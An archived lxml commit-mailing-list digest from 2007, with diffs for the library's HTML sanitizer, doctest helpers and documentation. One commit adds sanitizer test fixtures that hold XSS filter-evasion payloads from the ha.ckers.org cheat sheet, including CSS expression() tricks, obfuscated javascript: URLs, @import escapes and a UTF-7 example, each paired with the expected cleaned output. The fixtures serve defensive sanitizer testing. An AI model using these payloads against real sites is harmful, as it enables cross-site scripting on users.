lxml/branch/html/src/lxml/html/clean.py Log: allow whitespace after expression () Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 22:43:22 2007 @@ -19,7 +19,7 @@ # This is an IE-specific construct you can have in a stylesheet to # run some Javascript: _css_javascript_re = re.compile( - r'expression\(.*?\)', re.S|re.I) + r'expression\s*\(.*?\)', re.S|re.I) # All kinds of schemes besides just javascript: that can cause # execution: From ianb at codespeak.net Sat Jun 2 02:43:06 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 02:43:06 +0200 (CEST) Subject: [Lxml-checkins] r43986 - lxml/branch/html/src/lxml Message-ID: <20070602004306.678778082@code0.codespeak.net> Author: ianb Date: Sat Jun 2 02:43:05 2007 New Revision: 43986 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: problem with displaying attributes that are missing in got Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Sat Jun 2 02:43:05 2007 @@ -292,7 +292,7 @@ text = self.format_text(value, False) attrs.append('%s="%s"' % (name, text)) if not any: - for name, value in sorted(got.attrib.items()): + for name, value in sorted(want.attrib.items()): if name in got.attrib: continue attrs.append('+%s="%s"' % (name, self.format_text(value, False))) From ianb at codespeak.net Sat Jun 2 03:36:37 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 03:36:37 +0200 (CEST) Subject: [Lxml-checkins] r43987 - lxml/branch/html/src/lxml/html Message-ID: <20070602013637.623FB8091@code0.codespeak.net> Author: ianb Date: Sat Jun 2 03:36:36 2007 New Revision: 43987 Modified: lxml/branch/html/src/lxml/html/defs.py Log: A couple new link attributes Modified: lxml/branch/html/src/lxml/html/defs.py ============================================================================== --- lxml/branch/html/src/lxml/html/defs.py (original) +++ lxml/branch/html/src/lxml/html/defs.py Sat Jun 2 03:36:36 2007 @@ -16,7 +16,10 @@ link_attrs = [ 'action', 'archive', 'background', 'cite', 'classid', 'codebase', 'data', 'href', 'longdesc', 'profile', 'src', - 'usemap'] + 'usemap', + # Not standard: + 'dynsrc', 'lowsrc', + ] # Not in the HTML 4 spec: # onerror, onresize From ianb at codespeak.net Sat Jun 2 03:37:12 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 03:37:12 +0200 (CEST) Subject: [Lxml-checkins] r43988 - lxml/branch/html/src/lxml/html Message-ID: <20070602013712.8890C8091@code0.codespeak.net> Author: ianb Date: Sat Jun 2 03:37:12 2007 New Revision: 43988 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: Fix the parsing of fragments a big, when there's just a single element that looks like a head element, and nothing that looks like a body element. Add a PI custom element Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Sat Jun 2 03:37:12 2007 @@ -261,9 +261,12 @@ class HtmlElement(etree.ElementBase, HtmlMixin): pass +class HtmlProcessingInstruction(etree.PIBase, HtmlMixin): + pass + html_parser = etree.HTMLParser() html_parser.setElementClassLookup(etree.ElementDefaultClassLookup( - element=HtmlElement, comment=HtmlComment)) + element=HtmlElement, comment=HtmlComment, pi=HtmlProcessingInstruction)) def HTML(html): # FIXME: should this notice a fragment and parse accordingly? @@ -345,20 +348,23 @@ # otherwise, lets parse it out... doc = HTML(html) bodies = doc.findall('body') - body = bodies[0] - if len(bodies) > 1: - # Somehow there are multiple bodies, which is bad, but just - # smash them into one body - for other_body in bodies[1:]: - if other_body.text: - if len(body): - body[-1].tail = (body[-1].tail or '') + other_body.text - else: - body.text = (body.text or '') + other_body.text - body.extend(other_body) - # We'll ignore tail - # I guess we are ignoring attributes too - other_body.drop_element() + if bodies: + body = bodies[0] + if len(bodies) > 1: + # Somehow there are multiple bodies, which is bad, but just + # smash them into one body + for other_body in bodies[1:]: + if other_body.text: + if len(body): + body[-1].tail = (body[-1].tail or '') + other_body.text + else: + body.text = (body.text or '') + other_body.text + body.extend(other_body) + # We'll ignore tail + # I guess we are ignoring attributes too + other_body.drop_element() + else: + body = None heads = doc.findall('head') if heads: # Well, we have some sort of structure, so lets keep it all @@ -369,7 +375,6 @@ # We don't care about text or tail in a head other_head.drop_element() return doc - if (len(body) == 1 and (not body.text or not body.text.strip()) and (not body[-1].tail or not body[-1].tail.strip())): # The body has just one element, so it was probably a single From ianb at codespeak.net Sat Jun 2 03:38:49 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 03:38:49 +0200 (CEST) Subject: [Lxml-checkins] r43989 - in lxml/branch/html/src/lxml/html: . tests tests/hackers-org-data Message-ID: <20070602013849.E7BCD8091@code0.codespeak.net> Author: ianb Date: Sat Jun 2 03:38:49 2007 New Revision: 43989 Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/ lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-plus.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-with-unicoded.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/html-plus-time.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/javascript-link.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-comment.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-expression.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-import.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-js-tag.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-url-js.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-data-island.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-embedded-js.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-namespace.data Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py Log: Fix a number of smaller XSS attacks Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sat Jun 2 03:38:49 2007 @@ -15,17 +15,30 @@ # Some way to whitelist object, iframe, etc (e.g., if you want to # allow *just* embedded YouTube movies) # Log what was deleted and why? +# style="behavior: ..." might be bad in IE? +# Should we have something for just <meta http-equiv>? That's the worst of the +# metas. +# UTF-7 detections? Example: +# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +# you don't always have to have the charset set, if the page has no charset +# and there's UTF7-like code in it. + # This is an IE-specific construct you can have in a stylesheet to # run some Javascript: _css_javascript_re = re.compile( r'expression\s*\(.*?\)', re.S|re.I) +# Do I have to worry about @\nimport? +_css_import_re = re.compile( + r'@\s*import', re.I) + # All kinds of schemes besides just javascript: that can cause # execution: _javascript_scheme_re = re.compile( - r'\s*(?:javascript|jscript|livescript|vbscript|about):', re.I) + r'\s*(?:javascript|jscript|livescript|vbscript|about|mocha):', re.I) _whitespace_re = re.compile(r'\s+') +# FIXME: should data: be blocked? def clean_html(html, **kw): """ @@ -53,6 +66,7 @@ links=True, meta=True, page_structure=True, + processing_instructions=True, embedded=True, frames=True, forms=True, @@ -88,7 +102,10 @@ ``page_structure``: Structural parts of a page: ``<head>``, ``<html>``, ``<title>``. - Also xmlns attributes are removed with this. + + ``processing_instructions``: + Remove any processing instructions. Also xmlns attributes are + removed with this. ``embedded``: Remove any embedded objects (flash, iframes) @@ -154,21 +171,39 @@ for el in doc.xpath('descendant-or-self::*[@style]'): old = el.attrib['style'] new = _css_javascript_re.sub('', old) - if new != old: + new = _css_import_re.sub('', old) + if _has_sneaky_javascript(new): + # Something tricky is going on... + del el.attrib['style'] + elif new != old: el.attrib['style'] = new for el in doc.xpath('descendant-or-self::style'): + if el.attrib.get('type', '').lower().strip() == 'text/javascript': + el.drop_element() + continue old = el.text or '' new = _css_javascript_re.sub('', old) - if new != old: + # The imported CSS can do anything; we just can't allow: + new = _css_import_re.sub('', old) + if _has_sneaky_javascript(new): + # Something tricky is going on... + el.text = '/* deleted */' + elif new != old: el.text = new - if comments: + if comments or processing_instructions: # Easier way? bad = [] for el in _itertree(doc): - if isinstance(el, etree._Comment): + if comments and isinstance(el, etree._Comment): + bad.append(el) + if processing_instructions and isinstance(el, etree._ProcessingInstruction): bad.append(el) for el in bad: el.drop_element() + if processing_instructions: + # FIXME: is this really the right place to remove these attributes? + for el in doc.xpath('descendant-or-self::*[@xmlns]'): + del el.attrib['xmlns'] if style: kill_tags.append('style') for el in doc.xpath('descendant-or-self::link[lower-case(@rel)="stylesheet"]'): @@ -177,13 +212,14 @@ del el.attrib['style'] if links: kill_tags.append('link') + elif javascript: + # FIXME: we should get rid of included stylesheets in this + # case, as you can put Javascript in them + pass if meta: kill_tags.append('meta') if page_structure: remove_tags.extend(['head', 'html', 'title']) - # FIXME: is this really the right place to remove these attributes? - for el in doc.xpath('descendant-or-self::*[@xmlns]'): - del el.attrib['xmlns'] if embedded: # FIXME: is <layer> really embedded? kill_tags.extend(['applet', 'param']) @@ -452,6 +488,16 @@ word = word[len(start):] result += word return result - - + +_decomment_re = re.compile(r'/\*.*?\*/', re.S) + +def _has_sneaky_javascript(style): + style = _decomment_re.sub('', style) + style = style.replace('\\', '') + style = _whitespace_re.sub('', style) + if 'javascript:' in style: + return True + if 'expression(' in style: + return True + return False Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-plus.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-plus.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279) + http://ha.ckers.org/xss.html#XSS_DIV_background-image_plus +Options: -safe_attrs_only +Notes: As you see, the CSS gets corrupted, but I don't really care that much. + +<DIV STYLE="background-image: url(javascript:alert('XSS'))">text</div> +---------- +<div style="background-image: url(">text</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-with-unicoded.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-with-unicoded.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,10 @@ +Description: exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail. + http://ha.ckers.org/xss.html#XSS_DIV_background_image_unicode +Options: -safe_attrs_only +Ignore: true +Notes: I don't understand how this exploit works. It seems like the description actually refers to + the unicode you'd import, but why that matters I don't know. + +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">text</div> +---------- +<div style="background-image: ">text</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,11 @@ +Description: Downlevel-Hidden-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job + http://ha.ckers.org/xss.html#XSS_Downlevel-Hidden +Options: -comments + +<div><!--[if gte IE 4]> +<SCRIPT>alert('XSS');</SCRIPT> +<![endif]--></div> +---------- +<div>[if gte IE 4]> +<SCRIPT>alert('XSS');</SCRIPT> +<![endif]</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/html-plus-time.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/html-plus-time.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,12 @@ +Description: HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work + http://ha.ckers.org/xss.html#XSS_HTML_plus_time +Ignore: true +Notes: I don't understand the vector here, or how this is supposed to work. + +<div> +<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> +</BODY></HTML></div> +---------- +<div> +<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> +</BODY></HTML>x</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/javascript-link.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/javascript-link.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,15 @@ +Description: javascript: in many forms + +<div> + <a href="java +script:alert()">x</a> + <a href="j a v a s c r i p t:alert()">x</a> + <a href="jscript +:alert()">x</a> +</div> +---------- +<div> + <a href="">x</a> + <a href="">x</a> + <a href="">x</a> +</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-comment.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-comment.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: to break up expression (Thanks to Roman Ivanov for this one) + http://ha.ckers.org/xss.html#XSS_STYLE_comment +Options: -safe_attrs_only +Notes: Because of the suspicious stuff in there, the style is removed entirely + +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +---------- +<img> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-expression.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-expression.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,10 @@ +Description: (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop) + http://ha.ckers.org/xss.html#XSS_IMG_STYLE_expression +Options: -safe_attrs_only +Notes: Modified to avoid a parsing in libxml2 that ruins the XSS (the " marks). + Also there seemed to be an extra "p" in exppression + +<div><img style="xss: ex/*<A STYLE='no\xss:noxss(*//*); +xss:ex/*XSS*//*/*/pression(alert('XSS'))"></div> +---------- +<div><img></div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-import.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-import.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts) + http://ha.ckers.org/xss.html#XSS_STYLE +Options: -safe_attrs_only + +<div><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></div> +---------- +<div><style>/* deleted */</style></div> + Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-js-tag.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-js-tag.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,7 @@ +Description: (Older versions of Netscape only) + http://ha.ckers.org/xss.html#XSS_STYLE_tag +Options: -safe_attrs_only + +<div><STYLE TYPE="text/javascript">alert('XSS');</STYLE></div> +---------- +<div></div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-url-js.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-url-js.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: http://ha.ckers.org/xss.html#XSS_STYLE_background-image +Options: -style, -safe_attrs_only +Notes: The CSS is messed up here, but so it goes + +<div><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></div> +---------- +<div><style>.XSS{background-image:url()");}</style><a class="XSS"></a></div> + Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-data-island.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-data-island.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,10 @@ +Description: XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive) + http://ha.ckers.org/xss.html#XSS_XML_data_island_comment +Ignore: true +Notes: I don't understand the vector here. Maybe datasrc should be filtered? + +<div><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> +<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></div> +---------- +<div><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> +<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>x</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-embedded-js.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-embedded-js.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,9 @@ +Description: Locally hosted XML with embedded JavaScript#XSS_Local_XML that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here <http://ha.ckers.org/xssxmltest.html> + http://ha.ckers.org/xss.html#XSS_Local_XML + +<div><XML SRC="xsstest.xml" ID=I></XML> +<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></div> +---------- +<div> + <span></span> +</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-namespace.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-namespace.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,16 @@ +Description: XML namespace. The htc file must be located on the same server as your XSS vector + http://ha.ckers.org/xss.html#XSS_XML_namespace +Note: I don't completely understand the vector here. page_structure is what does this. + +<HTML xmlns:xss> + <body> + <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> + <xss:xss>XSS</xss:xss> + </body> +</HTML> +---------- +<HTML> + <body> + <div>XSS</div> + </body> +</HTML> Modified: lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py (original) +++ lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py Sat Jun 2 03:38:49 2007 @@ -8,7 +8,10 @@ from lxml.html import HTML, parse_element from lxml.html.clean import clean, clean_html -feed_dir = os.path.join(os.path.dirname(__file__), 'feedparser-data') +feed_dirs = [ + os.path.join(os.path.dirname(__file__), 'feedparser-data'), + os.path.join(os.path.dirname(__file__), 'hackers-org-data'), + ] bar_re = re.compile(r"-----+") class DummyInput: @@ -31,10 +34,10 @@ raise Exception( "File %s has no headers" % self.filename) self.description = headers['Description'] - self.expect = headers['Expect'] + self.expect = headers.get('Expect', '') self.ignore = headers.get('Ignore') self.options = [ - o.strip() for o in headers['Options'].split(',') + o.strip() for o in headers.get('Options', '').split(',') if o.strip()] parts = bar_re.split(c) self.input = parts[0].rstrip() + '\n' @@ -54,7 +57,10 @@ kw[name[1:]] = False else: kw[name] = True - transformed = clean_html(self.input, **kw) + if kw.get('clean', True): + transformed = clean_html(self.input, **kw) + else: + transformed = self.input assert self.expect is not None, ( "No expected output in %s" % self.filename) checker = LHTMLOutputChecker() @@ -70,14 +76,15 @@ def test_suite(): suite = unittest.TestSuite() - for fn in os.listdir(feed_dir): - fn = os.path.join(feed_dir, fn) - if fn.endswith('.data'): - case = FeedTestCase(fn) - suite.addTests([case]) - # This is my lazy way of stopping on first error: - try: - case.runTest() - except: - break + for dir in feed_dirs: + for fn in os.listdir(dir): + fn = os.path.join(dir, fn) + if fn.endswith('.data'): + case = FeedTestCase(fn) + suite.addTests([case]) + # This is my lazy way of stopping on first error: + try: + case.runTest() + except: + break return suite From scoder at codespeak.net Sun Jun 3 18:25:34 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 3 Jun 2007 18:25:34 +0200 (CEST) Subject: [Lxml-checkins] r44009 - lxml/trunk/doc Message-ID: <20070603162534.AE2808082@code0.codespeak.net> Author: scoder Date: Sun Jun 3 18:25:33 2007 New Revision: 44009 Modified: lxml/trunk/doc/FAQ.txt Log: FAQ: make clear that some crashes are due to libxml2 Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Sun Jun 3 18:25:33 2007 @@ -258,7 +258,12 @@ b) If you are using threads, please see the following section to check if you touch on one of the potential pitfalls. -c) Otherwise, we would really like to hear about it. Please report it to the +c) Try to reproduce the problem with the latest versions of libxml2 and + libxslt. From time to time, bugs and race conditions are found in these + libraries, so a more recent version might already contain a fix for your + problem. + +d) Otherwise, we would really like to hear about it. Please report it to the `mailing list`_ so that we can fix it. It is very helpful in this case if you can come up with a short code snippet that demonstrates your problem. Please also report the version of lxml, libxml2 and libxslt that you are From scoder at codespeak.net Sun Jun 3 18:26:28 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 3 Jun 2007 18:26:28 +0200 (CEST) Subject: [Lxml-checkins] r44010 - lxml/trunk Message-ID: <20070603162628.3EDDD80AF@code0.codespeak.net> Author: scoder Date: Sun Jun 3 18:26:27 2007 New Revision: 44010 Modified: lxml/trunk/TODO.txt Log: 2.0 todo Modified: lxml/trunk/TODO.txt ============================================================================== --- lxml/trunk/TODO.txt (original) +++ lxml/trunk/TODO.txt Sun Jun 3 18:26:27 2007 @@ -70,3 +70,5 @@ * follow PEP 8 in API naming (avoidCamelCase in_favour_of_underscores) * clean support for entities (maybe an Entity element class?) + +* disable network access in parsers by default From scoder at codespeak.net Sun Jun 3 18:36:47 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 3 Jun 2007 18:36:47 +0200 (CEST) Subject: [Lxml-checkins] r44011 - lxml/branch/html/src/lxml/html Message-ID: <20070603163647.7CA8F80CE@code0.codespeak.net> Author: scoder Date: Sun Jun 3 18:36:47 2007 New Revision: 44011 Modified: lxml/branch/html/src/lxml/html/clean.py Log: better way to deal with comments and PIs Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sun Jun 3 18:36:47 2007 @@ -61,7 +61,6 @@ scripts=True, javascript=True, comments=True, - # process instructions? style=False, links=True, meta=True, @@ -104,8 +103,7 @@ Structural parts of a page: ``<head>``, ``<html>``, ``<title>``. ``processing_instructions``: - Remove any processing instructions. Also xmlns attributes are - removed with this. + Remove any processing instructions. ``embedded``: Remove any embedded objects (flash, iframes) @@ -191,19 +189,14 @@ elif new != old: el.text = new if comments or processing_instructions: - # Easier way? - bad = [] - for el in _itertree(doc): - if comments and isinstance(el, etree._Comment): - bad.append(el) - if processing_instructions and isinstance(el, etree._ProcessingInstruction): - bad.append(el) - for el in bad: - el.drop_element() + kill_tags.append(etree.Comment) if processing_instructions: - # FIXME: is this really the right place to remove these attributes? - for el in doc.xpath('descendant-or-self::*[@xmlns]'): - del el.attrib['xmlns'] + kill_tags.append(etree.ProcessingInstruction) +## SB: Does this actually work? Definitely not the right place to do this. +# if processing_instructions: +# # FIXME: is this really the right place to remove these attributes? +# for el in doc.xpath('descendant-or-self::*[@xmlns]'): +# del el.attrib['xmlns'] if style: kill_tags.append('style') for el in doc.xpath('descendant-or-self::link[lower-case(@rel)="stylesheet"]'): From scoder at codespeak.net Mon Jun 4 11:13:16 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 4 Jun 2007 11:13:16 +0200 (CEST) Subject: [Lxml-checkins] r44015 - lxml/branch/html/src/lxml/html Message-ID: <20070604091316.9588E80B0@code0.codespeak.net> Author: scoder Date: Mon Jun 4 11:13:15 2007 New Revision: 44015 Modified: lxml/branch/html/src/lxml/html/clean.py Log: come cleanup Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Mon Jun 4 11:13:15 2007 @@ -151,32 +151,34 @@ kill_tags.append('script') if safe_attrs_only: safe_attrs = set(defs.safe_attrs) - for el in _itertree(doc): - for aname in el.attrib.keys(): + for el in doc.getiterator(): + attrib = el.attrib + for aname in attrib.keys(): if aname not in defs.safe_attrs: - del el.attrib[aname] + del attrib[aname] if javascript: if not safe_attrs_only: # safe_attrs handles events attributes itself - for el in _itertree(doc): - for aname in el.attrib.keys(): + for el in doc.getiterator(): + attrib = el.attrib + for aname in attrib.keys(): if aname.startswith('on'): - del el.attrib[aname] + del attrib[aname] doc.rewrite_links(_remove_javascript, resolve_base_href=False) if not style: # If we're deleting style then we don't have to remove JS links # from styles, otherwise... for el in doc.xpath('descendant-or-self::*[@style]'): - old = el.attrib['style'] + old = el.get('style') new = _css_javascript_re.sub('', old) new = _css_import_re.sub('', old) if _has_sneaky_javascript(new): # Something tricky is going on... del el.attrib['style'] elif new != old: - el.attrib['style'] = new + el.set('style', new) for el in doc.xpath('descendant-or-self::style'): - if el.attrib.get('type', '').lower().strip() == 'text/javascript': + if el.get('type', '').lower().strip() == 'text/javascript': el.drop_element() continue old = el.text or '' From ianb at codespeak.net Wed Jun 6 10:08:24 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 6 Jun 2007 10:08:24 +0200 (CEST) Subject: [Lxml-checkins] r44048 - in lxml/branch/html/src/lxml: . html Message-ID: <20070606080824.557AE80C4@code0.codespeak.net> Author: ianb Date: Wed Jun 6 10:08:23 2007 New Revision: 44048 Modified: lxml/branch/html/src/lxml/doctestcompare.py lxml/branch/html/src/lxml/html/usedoctest.py lxml/branch/html/src/lxml/usedoctest.py Log: show comments properly. Remove the usedoctest modules after they are used, so they can be usefully reimported later. Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Wed Jun 6 10:08:23 2007 @@ -228,6 +228,9 @@ def format_tag(self, el): attrs = [] + if isinstance(el, etree.CommentBase): + # FIXME: probably PIs should be handled specially too? + return '<!--' for name, value in sorted(el.attrib.items()): attrs.append('%s="%s"' % (name, self.format_text(value, False))) if not attrs: @@ -235,6 +238,9 @@ return '<%s %s>' % (el.tag, ' '.join(attrs)) def format_end_tag(self, el): + if isinstance(el, etree.CommentBase): + # FIXME: probably PIs should be handled specially too? + return '-->' return '</%s>' % el.tag def collect_diff(self, want, got, html, indent): @@ -333,7 +339,7 @@ else: doctest.OutputChecker = LXMLOutputChecker -def temp_install(html=False): +def temp_install(html=False, del_module=None): """ Use this *inside* a doctest to enable this checker for this doctest only. @@ -364,16 +370,19 @@ # in check_output that we care about: doctest.etree = etree _RestoreChecker(dt_self, old_checker, checker, - check_func, checker.check_output.im_func) + check_func, checker.check_output.im_func, + del_module) class _RestoreChecker(object): - def __init__(self, dt_self, old_checker, new_checker, check_func, clone_func): + def __init__(self, dt_self, old_checker, new_checker, check_func, clone_func, + del_module): self.dt_self = dt_self self.checker = old_checker self.checker._temp_call_super_check_output = self.call_super self.checker._temp_override_self = new_checker self.check_func = check_func self.clone_func = clone_func + self.del_module = del_module self.install_clone() self.install_dt_self() def install_clone(self): @@ -387,12 +396,22 @@ self.dt_self._DocTestRunner__record_outcome = self def uninstall_dt_self(self): self.dt_self._DocTestRunner__record_outcome = self.prev_func + def uninstall_module(self): + if self.del_module: + import sys + del sys.modules[self.del_module] + if '.' in self.del_module: + package, module = self.del_module.rsplit('.', 1) + package_mod = sys.modules[package] + delattr(package_mod, module) def __call__(self, *args, **kw): self.uninstall_clone() self.uninstall_dt_self() del self.checker._temp_override_self del self.checker._temp_call_super_check_output - return self.prev_func(*args, **kw) + result = self.prev_func(*args, **kw) + self.uninstall_module() + return result def call_super(self, *args, **kw): self.uninstall_clone() try: Modified: lxml/branch/html/src/lxml/html/usedoctest.py ============================================================================== --- lxml/branch/html/src/lxml/html/usedoctest.py (original) +++ lxml/branch/html/src/lxml/html/usedoctest.py Wed Jun 6 10:08:23 2007 @@ -1,3 +1,3 @@ from lxml import doctestcompare -doctestcompare.temp_install(html=True) +doctestcompare.temp_install(html=True, del_module=__name__) Modified: lxml/branch/html/src/lxml/usedoctest.py ============================================================================== --- lxml/branch/html/src/lxml/usedoctest.py (original) +++ lxml/branch/html/src/lxml/usedoctest.py Wed Jun 6 10:08:23 2007 @@ -1,3 +1,3 @@ from lxml import doctestcompare -doctestcompare.temp_install() +doctestcompare.temp_install(del_module=__name__) From ianb at codespeak.net Wed Jun 6 10:10:04 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 6 Jun 2007 10:10:04 +0200 (CEST) Subject: [Lxml-checkins] r44049 - lxml/branch/html/src/lxml/html Message-ID: <20070606081004.E4E4A80CB@code0.codespeak.net> Author: ianb Date: Wed Jun 6 10:10:04 2007 New Revision: 44049 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: Make iter_links also find link in the root element (wouldn't work with iterdescendants). Make function alternatives to the methods use parse() instead of an explicit keyword argument (maybe an explicit option should also be allowed though). Made the parser use <span> when possible and necessar Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Wed Jun 6 10:10:04 2007 @@ -151,7 +151,7 @@ link you 